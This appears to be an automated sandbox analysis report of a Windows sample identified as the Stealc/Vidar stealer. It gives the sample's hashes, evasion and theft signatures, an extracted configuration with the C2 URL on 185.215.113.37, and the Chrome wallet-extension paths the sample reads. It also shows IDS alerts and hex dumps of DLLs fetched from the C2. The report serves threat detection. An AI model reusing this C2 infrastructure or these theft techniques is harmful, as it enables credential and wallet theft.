Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538297
MD5: 3ddd3285248eedf8b26f3fb256f2a9a9
SHA1: b87fe1fa8c3629818b9e1dd32ceed194766358f8
SHA256: 7e97a2b505c5c1921dd8a5da2ef5f879e79977ee1f856c776889f3d3765be4cc
Tags: exeuser-Bitsight
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll URL Reputation: Label: malware
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll URL Reputation: Label: malware
Found malware configuration
Source: 6.2.file.exe.d90000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 6.2.file.exe.d90000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D99B60 CryptUnprotectData,LocalAlloc,LocalFree, 6_2_00D99B60
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 6_2_00D9C820
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D99AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 6_2_00D99AC0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D97240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 6_2_00D97240
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 6_2_00DA8EA0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C576C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 6_2_6C576C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000006.00000002.1565403351.000000006C5DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.6.dr, freebl3[1].dll.6.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.6.dr, freebl3[1].dll.6.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr
Source: Binary string: softokn3.pdb@ source: softokn3.dll.6.dr, softokn3[1].dll.6.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.6.dr, vcruntime140[1].dll.6.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.6.dr, msvcp140.dll.6.dr
Source: Binary string: nss3.pdb source: file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000006.00000002.1565403351.000000006C5DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.6.dr, softokn3[1].dll.6.dr
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00DA4910
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 6_2_00D9DA80
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 6_2_00D9E430
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00D916D0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00D9F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 6_2_00DA3EA0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 6_2_00D9BE70
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 6_2_00DA38B0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 6_2_00DA4570
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 6_2_00D9ED20
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00D9DE10
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:49708 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.11:49708 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.11:49708
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.11:49708 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.11:49708
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.11:49708 -> 185.215.113.37:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 21:43:03 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 21:43:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 21:43:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 21:43:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 